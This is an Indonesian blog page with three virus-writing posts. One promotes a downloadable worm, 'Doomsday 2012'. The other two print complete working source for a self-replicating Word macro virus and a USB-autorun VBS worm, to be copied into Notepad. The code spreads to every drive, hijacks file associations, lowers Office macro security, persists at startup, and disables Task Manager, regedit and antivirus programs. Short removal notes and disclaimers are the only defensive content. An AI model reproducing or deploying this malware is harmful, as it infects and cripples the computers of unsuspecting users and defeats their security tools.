CLICK HERE FOR BLOGGER TEMPLATES AND MYSPACE LAYOUTS »

Kamis, 18 Juni 2009

DOOMSDAY 2012 - Virus Mantap!

Doomsday 2012 adalah salah satu dari 5 WSar alias Worm Dasar yang penulis bahas pada sebuah buku dengan codename “Computer Worm III - The Biggest Secret Finally Revealed”. Walaupun merupakan Worm Dasar yang sangat sederhana tetapi Doomsday 2012 saat artikel ini dimuat mampu bertahan dari scan engine antivirus lokal, baik yang mengaku antivirus terbaik didunia ataupun tidak.

Sengaja penulis publish lebih dahulu agar para pemberantas virus, worm, dkk dapat melakukan research dan tindakan-tindakan prefentif. Doomsday 2012 tidak memiliki payload dan tidak melakukan pengrusakan pada file apapun, baik file system atau file dokumen lainnya.. Doomsday 2012 hanya memuat rutin pertahanan dan penyebaran saja.

Sambil mencari bug pada Doomsday 2012, penulis menantang anda membuat program removal untuk Doomsday 2012, 2 program terbaik yang mampu dengan tuntas membersihkan Doomsday 2012 baik file launcher ataupun infector (pada media storage seperti flashdisk atau jaringan) dan mengembalikan manipulasi yang dilakukan.. masing-masing berhak untuk mendapatkan 1 buah buku sesuai pilihan di http://www.tokomahal.com (hadiah langsung dari penulis) adapun persyaratannya adalah:

1. Program removal boleh dibuat dengan menggunakan bahasa pemrograman apapun
2. Program removal tidak menyertakan file pendukung lain yang terpisah (ocx, dll, dan lain sebagainya)
3. Filesize program removal tidak boleh lebih dari 1 Mb.
4. Jika program removal kompleks agar menyertakan cara penggunaannya.
5. Program removal akan dijalankan saat Doomsday 2012 aktif pada system Windows XP SP2 dengan system harddisk NTFS.

Cara pendaftaran sederhana, anda tinggal mengisi komentar pada artikel ini untuk alamat download program removal tersebut. (pengisian komentar juga bisa di lakukan tanpa registrasi di http://darmal.blog.friendster.com) Pendaftaran dinyatakan berakhir pada tanggal 18 Juli 2009. Dan jika ada pemenang (jika ada loh) akan diumumkan pada tanggal 21 Juli 2009 di http://darmal.blog.friendster.com

Dengan mendownload Doomsday 2012, berarti anda setuju untuk menanggung segala resiko dan berhati-hati sehingga Doomsday 2012 tidak terlepas dari pengawasan Anda.. Penulis tidak bertanggung jawab atas segala resiko dan penyalahgunaan yang terjadi.

DOWNLOAD DISINI!

nb. Saya tidak akan terlalu heran jika tidak ada yang mampu melakukan pendaftaran, 3 antivirus lokal terbesar di Indonesia saja (PCMAV, ANSAV dan SMADAV) tidak sanggup menghentikan Doomsday 2012.. apalagi Anda.

Rabu, 17 Juni 2009

Tutorial Membuat Virus Macro

Ini adalah tutorial saya yang kesekian kalinya dan mudah-mudahan tutorial kali ini bermanfaat untuk kalian.

Kali ini saya akan membahas mengenai virus macro… (para virus maker diharap untuk tenang dulu!).

Pasti banyak bertanya kenapa kali ini Morphic membahas tentang cara membuat virus? Biasanya kan Morphic lebih sering membahas analisis virus atau antivirusnya itu….

Yah kali ini memang agak berbeda. Selain untuk mencari suasana baru, aku juga agak tertantang dengan artikel yang saya buat ini.

Sebelum aku membuat artikel ini, aku sengaja mencari-cari kelemahan dari antivirusku sendiri (baca:Morphost). Ternyata aku lebih tertarik untuk membuat virus macro untuk mencari celah antivirusku itu. Untuk membuat artikel ini memang butuh pengorbanan juga. Soalnya komputerku jadi terinfeksi oleh virusku sendiri. Haaahhh…..


Virus macro merupakan virus yang dibuat dalam bahasa pemrograman visual basic macro di Microsoft Office. Kita ambil contoh, virus macro Word.

CARA MEMBUAT VIRUS MACRO

  1. Buka Ms.Word (hanya contoh)
  2. buka tools > Macro> Visual Basic Editor

  • Akan muncul gambar di bawah

Lalu kita ketikkan source virus nya pada kotak putih diatas dan akan tampak gambar seperti dibawah ini.

Sekarang muncul pertanyaan! Source yang bagaimana yang harus diketik???

Tenang, aku dah siapkan kok sourcenya. Makan neh source code!

‘This is my code’s virus

‘Fuck Gates. Your software has small weakness. Watch it!

‘Macro Viruses

‘[Macroid]

‘Hanya untuk pembelajaran

Private Sub Document_Close()

Dim AD, NT As Object

Dim isi As String

Set AD = ActiveDocument.VBProject.VBComponents.Item(1)

Set NT = NormalTemplate.VBProject.VBComponents.Item(1)

If AD.Name <> “Macroid” Then

AD.CodeModule.DeleteLines 1, AD.CodeModule.CountOfLines

AD.Name = “Macroid”

isi = NT.CodeModule.Lines(1, NT.CodeModule.CountOfLines)

AD.CodeModule.AddFromString isi

ActiveDocument.Save

End If

If NT.Name <> “Macroid” Then

NT.CodeModule.DeleteLines 1, NT.CodeModule.CountOfLines

NT.Name = “Macroid”

isi = AD.CodeModule.Lines(1, AD.CodeModule.CountOfLines)

NT.CodeModule.AddFromString isi

NormalTemplate.Save

End If

If InStr(ActiveDocument.Content, “Macroid”) = 0 Then

ActiveDocument.Content = “[Macroid]” & vbCrLf & ActiveDocument.Content & vbCrLf & vbCrLf & vbCrLf & “[Macroid] by Morphic” & vbCrLf & “copyright(c) Medan Juli-2008″

End If

On Error Resume Next

Dim b As Object

Set b = CreateObject(”Wscript.Shell”)

b.regwrite “HKCU\SOFTWARE\Microsoft\Internet Explorer\Main\Window Title”, “Browser Internet ini diambil alih oleh Macroid”

b.regwrite “HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption”, “Macroid”

b.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOrganization”, “Macroid”

b.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner”, “VM-Morphic”

b.regwrite “HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText”, “Macroid-A. Eat this!!! Ha ha ha”

b.regwrite “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Advanced\Hidden”, “2″

b.regwrite “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind”, “1″

b.regwrite “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions”, “1″

b.regwrite “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun”, “1″

b.regwrite “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools”, “1″

b.regwrite “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr”, “1″

b.regwrite “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt”, “1″

b.regwrite “HKLM\SOFTWARE\Classes\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\”, “Tong Sampah Macroid”

b.regwrite “HKLM\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\”, “Komputer Morphic”

b.regwrite “HKLM\SOFTWARE\Classes\exefile\shell\open\command\”, “Winword.exe ” & Environ$(”windir”) & “\Macroid.doc”

b.regwrite “HKLM\SOFTWARE\Classes\comfile\shell\open\command\”, “Winword.exe ” & Environ$(”windir”) & “\Macroid.doc”

b.regwrite “HKLM\SOFTWARE\Classes\vbsfile\shell\edit\command\”, “Winword.exe ” & Environ$(”windir”) & “\Macroid.doc”

b.regwrite “HKLM\SOFTWARE\Classes\txtfile\shell\open\command\”, “Winword.exe ” & Environ$(”windir”) & “\Macroid.doc”

b.regwrite “HKLM\SOFTWARE\Classes\scrfile\shell\open\command\”, “Winword.exe ” & Environ$(”windir”) & “\Macroid.doc”

b.regwrite “HKLM\SOFTWARE\Classes\batfile\shell\open\command\”, “Winword.exe ” & Environ$(”windir”) & “\Macroid.doc”

b.regwrite “HKLM\SOFTWARE\Classes\Folder\shell\”, “0pen”

b.regwrite “HKLM\SOFTWARE\Classes\Folder\shellpen\”, “&Open”

b.regwrite “HKLM\SOFTWARE\Classes\Folder\shellpen\command\”, “wscript.exe ” & Environ$(”windir”) & “\avmc.vbs”

b.regwrite “HKLM\SOFTWARE\Classes\VisualBasic.Project\shell\open\command\”, “Winword.exe ” & Environ$(”windir”) & “\Macroid.doc”

On Error Resume Next

Dim rog As Integer

Dim atr, vbs, Tipu(10), Trik(10) As String

For a = 66 To 90

partisi = Chr$(a)

vbs = partisi & “:\auto.vbs”

atr = partisi & “:\autorun.inf”

Tipu(1) = partisi & “:\Soal SPMB 1995-2008.doc”

Tipu(2) = partisi & “:\Kisah di balik HarryPotter.doc”

Tipu(3) = partisi & “:\Titip File sebentar.doc”

Tipu(4) = partisi & “:\jangan di baca.doc”

Tipu(5) = partisi & “:\buku harian.doc”

Tipu(6) = partisi & “:\cerita hangat.doc”

Tipu(7) = partisi & “:\Punya Baim.doc”

Tipu(8) = partisi & “:\Teka-teki yang baru.doc”

Tipu(9) = partisi & “:\Kumpulan cerita lucu.doc”

Tipu(10) = partisi & “:\Trik Sulap.doc”

If Dir(Tipu(1)) = “” And Dir(Tipu(2)) = “” And Dir(Tipu(3)) = “” And Dir(Tipu(4)) = “” And Dir(Tipu(5)) = “” And Dir(Tipu(6)) = “” And Dir(Tipu(7)) = “” And Dir(Tipu(8)) = “” And Dir(Tipu(9)) = “” And Dir(Tipu(10)) = “” Then

Randomize

rog = Int(10 * Rnd) + 1

Open Tipu(rog) For Output As #1

Print #1, “”

Close #1

End If

Trik(1) = partisi & “:\Novel J.K.Rowling.doc”

Trik(2) = partisi & “:\cerita cinta.doc”

Trik(3) = partisi & “:\Ringkasan cerita HarryPotter.doc”

Trik(4) = partisi & “:\Semua Cheat game DOTA.doc”

Trik(5) = partisi & “:\Kumpulan Cheat game.doc”

Trik(6) = partisi & “:\Cheat game RF.doc”

Trik(7) = partisi & “:\Cheat game Ayo Dance.doc”

Trik(8) = partisi & “:\Goosebumps.doc”

Trik(9) = partisi & “:\FearStreet.doc”

Trik(10) = partisi & “:\R.L.Stine.doc”

If Dir(Trik(1)) = “” And Dir(Trik(2)) = “” And Dir(Trik(3)) = “” And Dir(Trik(4)) = “” And Dir(Trik(5)) = “” And Dir(Trik(6)) = “” And Dir(Trik(7)) = “” And Dir(Trik(8)) = “” And Dir(Trik(9)) = “” And Dir(Trik(10)) = “” Then

Randomize

rogi = Int(10 * Rnd) + 1

Open Trik(rogi) For Output As #1

Print #1, “”

Close #1

End If

Open atr For Output As #1

Print #1, “[Autorun]“

Print #1, “shell\Open\command=wscript.exe auto.vbs”

Close #1

SetAttr atr, vbHidden + vbSystem

Open vbs For Output As #1

Print #1, “dim a”

Print #1, “set a = createobject(” & Chr(34) & “Wscript.shell” & Chr(34) & “)”

Print #1, “a.regwrite ” & Chr(34) & “HKCU\Software\Microsoft\Office\10.0\Word\Security\Level” & Chr(34) & “,” & Chr(34) & “1″ & Chr(34) & “,” & Chr(34) & “REG_DWORD” & Chr(34)

Print #1, “a.regwrite ” & Chr(34) & “HKCU\Software\Microsoft\Office\11.0\Word\Security\Level” & Chr(34) & “,” & Chr(34) & “1″ & Chr(34) & “,” & Chr(34) & “REG_DWORD” & Chr(34)

Print #1, “a.regwrite ” & Chr(34) & “HKCU\Software\Microsoft\Office\12.0\Word\Security\Level” & Chr(34) & “,” & Chr(34) & “1″ & Chr(34) & “,” & Chr(34) & “REG_DWORD” & Chr(34)

Close #1

SetAttr vbs, vbHidden + vbSystem

Next a

If Dir(Environ$(”windir”) & “\Macroid.doc”) = “” Then

Dim isicrita As String

isicrita = “[Macroid] by Morphic” & vbCrLf & “Copyright(c) Medan Juli-2008″ & vbCrLf & vbCrLf & _

Chr(34) & “Ms.Word is a thing that can be used as a power to break everything…. ” & Chr(34) & vbCrLf & “(Morphic)”

Open Environ$(”windir”) & “\Macroid.doc” For Output As #1

Print #1, isicrita

Close #1

End If

If Dir(Environ$(”windir”) & “\avmc.vbs”) = “” Then

Open Environ$(”windir”) & “\avmc.vbs” For Output As #1

Print #1, “set fs = createobject(” & Chr(34) & “Scripting.FileSystemObject” & Chr(34) & “)”

Print #1, “for each FD in fs.drives”

Print #1, “if (FD.Drivetype = 1) and FD.Path <> ” & Chr(34) & “A:” & Chr(34) & ” then”

Print #1, “set tf = fs.CreateTextFile(FD.Path” & Chr(38) & Chr(34) & “\Jangan di baca.doc” & Chr(34) & “)”

Print #1, “end if”

Print #1, “Next”

Close #1

End If

ActiveDocument.Save

NormalTemplate.Save

End Sub

Private Sub Document_Open()

CommandBars(”Tools”).Controls(”Macro”).Visible = False

CommandBars(”Tools”).Controls(”Macro”).Enabled = False

CommandBars(”Tools”).Controls(”Customize…”).Visible = False

CommandBars(”Tools”).Controls(”Options…”).Visible = False

Dim AD, NT As Object

Dim isi As String

Set AD = ActiveDocument.VBProject.VBComponents.Item(1)

Set NT = NormalTemplate.VBProject.VBComponents.Item(1)

If AD.Name <> “Macroid” Then

AD.CodeModule.DeleteLines 1, AD.CodeModule.CountOfLines

AD.Name = “Macroid”

isi = NT.CodeModule.Lines(1, NT.CodeModule.CountOfLines)

AD.CodeModule.AddFromString isi

ActiveDocument.Save

End If

If NT.Name <> “Macroid” Then

NT.CodeModule.DeleteLines 1, NT.CodeModule.CountOfLines

NT.Name = “Macroid”

isi = AD.CodeModule.Lines(1, AD.CodeModule.CountOfLines)

NT.CodeModule.AddFromString isi

NormalTemplate.Save

End If

If InStr(ActiveDocument.Content, “Macroid”) = 0 Then

ActiveDocument.Content = “[Macroid]” & vbCrLf & ActiveDocument.Content & vbCrLf & vbCrLf & vbCrLf & “[Macroid] by Morphic” & vbCrLf & “copyright(c) Medan Juli-2008″

End If

On Error Resume Next

Dim b As Object

Set b = CreateObject(”Wscript.Shell”)

b.regwrite “HKCU\SOFTWARE\Microsoft\Internet Explorer\Main\Window Title”, “Browser Internet ini diambil alih oleh Macroid”

b.regwrite “HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption”, “Macroid”

b.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOrganization”, “Macroid”

b.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner”, “VM-Morphic”

b.regwrite “HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText”, “Macroid-A. Eat this!!! Ha ha ha”

b.regwrite “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Advanced\Hidden”, “2″

b.regwrite “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind”, “1″

b.regwrite “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions”, “1″

b.regwrite “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun”, “1″

b.regwrite “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools”, “1″

b.regwrite “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr”, “1″

b.regwrite “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt”, “1″

b.regwrite “HKLM\SOFTWARE\Classes\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\”, “Tong Sampah Macroid”

b.regwrite “HKLM\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\”, “Komputer Morphic”

b.regwrite “HKLM\SOFTWARE\Classes\exefile\shell\open\command\”, “Winword.exe ” & Environ$(”windir”) & “\Macroid.doc”

b.regwrite “HKLM\SOFTWARE\Classes\comfile\shell\open\command\”, “Winword.exe ” & Environ$(”windir”) & “\Macroid.doc”

b.regwrite “HKLM\SOFTWARE\Classes\vbsfile\shell\edit\command\”, “Winword.exe ” & Environ$(”windir”) & “\Macroid.doc”

b.regwrite “HKLM\SOFTWARE\Classes\txtfile\shell\open\command\”, “Winword.exe ” & Environ$(”windir”) & “\Macroid.doc”

b.regwrite “HKLM\SOFTWARE\Classes\scrfile\shell\open\command\”, “Winword.exe ” & Environ$(”windir”) & “\Macroid.doc”

b.regwrite “HKLM\SOFTWARE\Classes\batfile\shell\open\command\”, “Winword.exe ” & Environ$(”windir”) & “\Macroid.doc”

b.regwrite “HKLM\SOFTWARE\Classes\Folder\shell\”, “0pen”

b.regwrite “HKLM\SOFTWARE\Classes\Folder\shellpen\”, “&Open”

b.regwrite “HKLM\SOFTWARE\Classes\Folder\shellpen\command\”, “wscript.exe ” & Environ$(”windir”) & “\avmc.vbs”

b.regwrite “HKLM\SOFTWARE\Classes\VisualBasic.Project\shell\open\command\”, “Winword.exe ” & Environ$(”windir”) & “\Macroid.doc”

On Error Resume Next

Dim rog As Integer

Dim atr, vbs, Tipu(10), Trik(10) As String

For a = 66 To 90

partisi = Chr$(a)

vbs = partisi & “:\auto.vbs”

atr = partisi & “:\autorun.inf”

Tipu(1) = partisi & “:\Soal SPMB 1995-2008.doc”

Tipu(2) = partisi & “:\Kisah di balik HarryPotter.doc”

Tipu(3) = partisi & “:\Titip File sebentar.doc”

Tipu(4) = partisi & “:\jangan di baca.doc”

Tipu(5) = partisi & “:\buku harian.doc”

Tipu(6) = partisi & “:\cerita hangat.doc”

Tipu(7) = partisi & “:\Punya Baim.doc”

Tipu(8) = partisi & “:\Teka-teki yang baru.doc”

Tipu(9) = partisi & “:\Kumpulan cerita lucu.doc”

Tipu(10) = partisi & “:\Trik Sulap.doc”

If Dir(Tipu(1)) = “” And Dir(Tipu(2)) = “” And Dir(Tipu(3)) = “” And Dir(Tipu(4)) = “” And Dir(Tipu(5)) = “” And Dir(Tipu(6)) = “” And Dir(Tipu(7)) = “” And Dir(Tipu(8)) = “” And Dir(Tipu(9)) = “” And Dir(Tipu(10)) = “” Then

Randomize

rog = Int(10 * Rnd) + 1

Open Tipu(rog) For Output As #1

Print #1, “”

Close #1

End If

Trik(1) = partisi & “:\Novel J.K.Rowling.doc”

Trik(2) = partisi & “:\cerita cinta.doc”

Trik(3) = partisi & “:\Ringkasan cerita HarryPotter.doc”

Trik(4) = partisi & “:\Semua Cheat game DOTA.doc”

Trik(5) = partisi & “:\Kumpulan Cheat game.doc”

Trik(6) = partisi & “:\Cheat game RF.doc”

Trik(7) = partisi & “:\Cheat game Ayo Dance.doc”

Trik(8) = partisi & “:\Goosebumps.doc”

Trik(9) = partisi & “:\FearStreet.doc”

Trik(10) = partisi & “:\R.L.Stine.doc”

If Dir(Trik(1)) = “” And Dir(Trik(2)) = “” And Dir(Trik(3)) = “” And Dir(Trik(4)) = “” And Dir(Trik(5)) = “” And Dir(Trik(6)) = “” And Dir(Trik(7)) = “” And Dir(Trik(8)) = “” And Dir(Trik(9)) = “” And Dir(Trik(10)) = “” Then

Randomize

rogi = Int(10 * Rnd) + 1

Open Trik(rogi) For Output As #1

Print #1, “”

Close #1

End If

Open atr For Output As #1

Print #1, “[Autorun]“

Print #1, “shell\Open\command=wscript.exe auto.vbs”

Close #1

SetAttr atr, vbHidden + vbSystem

Open vbs For Output As #1

Print #1, “dim a”

Print #1, “set a = createobject(” & Chr(34) & “Wscript.shell” & Chr(34) & “)”

Print #1, “a.regwrite ” & Chr(34) & “HKCU\Software\Microsoft\Office\10.0\Word\Security\Level” & Chr(34) & “,” & Chr(34) & “1″ & Chr(34) & “,” & Chr(34) & “REG_DWORD” & Chr(34)

Print #1, “a.regwrite ” & Chr(34) & “HKCU\Software\Microsoft\Office\11.0\Word\Security\Level” & Chr(34) & “,” & Chr(34) & “1″ & Chr(34) & “,” & Chr(34) & “REG_DWORD” & Chr(34)

Print #1, “a.regwrite ” & Chr(34) & “HKCU\Software\Microsoft\Office\12.0\Word\Security\Level” & Chr(34) & “,” & Chr(34) & “1″ & Chr(34) & “,” & Chr(34) & “REG_DWORD” & Chr(34)

Close #1

SetAttr vbs, vbHidden + vbSystem

Next a

End Sub

Hati –hati dengan source diatas. Karena lumayan bikin pening juga. Tapi maaf ya kalo aku gak bisa jelasinnya sekarang. Karena kalo aku jelasin nanti tutorial ini terlalu panjangggggggggggggggg……. Makanya penjelasan mengenai source di atas aku buat di tutorial kedua.

EFEK-EFEK KECIL DAN TANDA-TANDA TERINFEKSI

Nah coba tebak mana file virus dan mana file yang bukan virus!!!!!!!!

Jawabannya lihat di bawah!!

KALONG-X.VBS

Nah kita akan buat virus. Yaitu KALONG-X.VBS. Lebih hebat dari Kalong.VBS. Sebenarnya ini varian ketiga. Sebenarnya virus ini sama saja dengan Kalong.VBS namun ditambahkan kemampuan manipulasi registry yang lebih mengerikan :)
Ayo sekarang kita buka saja Notepadnya dan ketikkan code berikut. Jika malas kan tinggak Copy > Paste….
‘Kalong-X
‘Varian dari Kalong.VBS
on error resume next

‘Dim kata-kata berikut
dim rekur,windowpath,desades,fs,mf,isi,tf,kalong,nt,check,sd

’siapkan isi autorun
isi = “[autorun]” & vbcrlf & “shellexecute=wscript.exe k4l0n6ms32.dll.vbs”
set fs = createobject(”Scripting.FileSystemObject”)
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text = mf.openastextstream(1,-2)
do while not text.atendofstream
rekur = rekur & text.readline
rekur = rekur & vbcrlf
loop
do

‘buat file induk
Set windowpath = fs.getspecialfolder(0)
set tf = fs.getfile(windowpath & “\k4l0n6-x.dll.vbs “)
tf.attributes = 32
set tf = fs.createtextfile(windowpath & “\k4l0n6-x.dll.vbs”,2,true)
tf.write rekur
tf.close
set tf = fs.getfile(windowpath & “\k4l0n6-x.dll.vbs”)
tf.attributes = 39

’sebar ke removable disc ditambahkan dengan Autorun.inf
for each desades in fs.drives

If (desades.drivetype = 1 or desades.drivetype = 2) and desades.path <> “A:” then

set tf=fs.getfile(desades.path &”\k4l0n6ms32.dll.vbs”)
tf.attributes =32
set tf=fs.createtextfile(desades.path &”\k4l0n6ms32.dll.vbs”,2,true)
tf.write rekur
tf.close
set tf=fs.getfile(desades.path &”\k4l0n6ms32.dll.vbs”)
tf.attributes = 39

set tf =fs.getfile(desades.path &”\autorun.inf”)
tf.attributes = 32
set tf=fs.createtextfile(desades.path &”\autorun.inf”,2,true)
tf.write isi
tf.close
set tf = fs.getfile(desades.path &”\autorun.inf”)
tf.attributes=39
end if
next

‘Manipulasi Registry
set kalong = createobject(”WScript.Shell”)

‘Ubah IE Title
kalong.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title”,”:: ->KALONG-X<- ::”

‘File Hidden tak terlihat
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Advanced\Hidden”,2, “REG_DWORD”

‘Blokir Find, FolderOptions, Run, Regedit, Task Manager, dan klik kanan
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind”, “1″, “REG_DWORD”
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions”, “1″, “REG_DWORD”
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun”, “1″, “REG_DWORD”
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools”, “1″, “REG_DWORD”
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr”, “1″, “REG_DWORD”
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu”, “1″, “REG_DWORD”

‘Buat pesan saat Windows Startup
kalong.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption”, “THE KALONG-X”
kalong.RegWrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeText”,”No reason for Panic”

‘Aktifkan saat Windows Startup
kalong.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Systemdir”, windowpath & “\batch- k4l0n6.dll.vbs”

‘Alihkan aplikasi berikut. Jika dibuka maka program terbuka dengan Notepad
kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmd.exe\Debugger”,”notepad.exe”
kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\install.exe\Debugger”,”notepad.exe”
kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe\Debugger”,”notepad.exe”
kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe\Debugger”,”notepad.exe”
kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedt32.exe\Debugger”,”notepad.exe”
kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RegistryEditor.exe\Debugger”,”notepad.exe”
kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\setup.exe\Debugger”,”notepad.exe”
kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV.exe\Debugger”,”notepad.exe”
kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-CLN.exe\Debugger”,”notepad.exe”
kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-RTP.exe\Debugger”,”notepad.exe”

‘Bonus
if check <> 1 then
Wscript.sleep 200000
end if
loop while check <> 1
set sd = createobject(”Wscript.shell”)
sd.run windowpath & “\explorer.exe /e,/select, ” & Wscript.ScriptFullname

Setelah Anda menempatkan kode tersebut klik FILE > SAVE. Di File Type pilih ALL FILES (*.*) lalu simpan dengan nama k4l0n6ms32.dll.vbs. Setelah itu coba Anda jalankan. Dan ya, Anda telah menjalankan KALONG-X.VBS di komputer Anda.
Jika Anda membuka aplikasi yang bernama : cmd.exe, install.exe, msconfig.exe, regedit.exe, regedt32.exe, RegistryEditor.exe, setup.exe, PCMAV.exe, PCMAV-CLN.exe, dan PCMAV-RTP.exe maka akan terbuka Notepad yang isinya kurang lebih mirip seperti ini :

Ingat jadilah orang yang bermanfaat bagi orang lain. Tidak ada “barang berbahaya” disini karena Andalah yang membuatnya berbahaya. Saya tidak bertanggung jawab apabila Anda menyalahgunakan kode ini. Ini untuk ilmu pengetahuan semata. Kalau disalahgunakan saya kutuk mukanya mirip Tukul (Wah…jadi terkenal nanti)…jangan deh. Pokoknya segala kenekatan Anda ditanggung oleh Anda sendiri.
Virus ini punya kemampuan Autorun jadi komputer yang dicolokkan Removable Disc (Mislanya Flash Disc) yang terinfeksi virus ini akan diinfeksi pula (jika Autorun tidak di non-aktifkan)
NOTE: Untuk membersihkan Kalong-X caranya mudah. Tinggal hentikan proses yang bernama wscript.exe. Jika di WinNT Anda bisa melakukannya lewat Task Manager. Tapi kalau Win9X silahkan cari tool pengganti Task Manager misalnya Procexp atau CurrProcess. Soalnya terkadang kalau lewat perintah Command Prompt gak bisa.
Setelah Anda memberhentikan proses wscript.exe hapus file induk yang bernama k4l0n6-x.dll.vbs di WINDOWSDIR (C:\Windows misalnya). Jika tidak ada tampilkan dulu file hidden dengan Folder Options. Setelah itu perbaiki Registry. Untuk mempercepat salin kode ini ke Notepad :
[Version]
Signature=”$Chicago$”
Provider=Fariskhi

[DefaultInstall]
AddReg=UnhookRegKey
DelReg=del

[UnhookRegKey]
HKCU,Software\Microsoft\Internet Explorer\Main, Window Title,0, “INTERNET EXPLORER”

[del]
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, NoFind
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, NoFolderOptions
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, NoRun
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\System, DisableRegistryTools
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\System, DisableTaskMgr
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, NoViewContextMenu
HKLM, Software\Microsoft\Windows\CurrentVersion\Winlogon, LegalNoticeCaption
HKLM, Software\Microsoft\Windows\CurrentVersion\Winlogon, LegalNoticeText
HKLM, Software\Microsoft\Windows\CurrentVersion\Run, Systemdir
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmd.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\install.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedt32.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RegistryEditor.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\setup.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-CLN.exe, Debugger
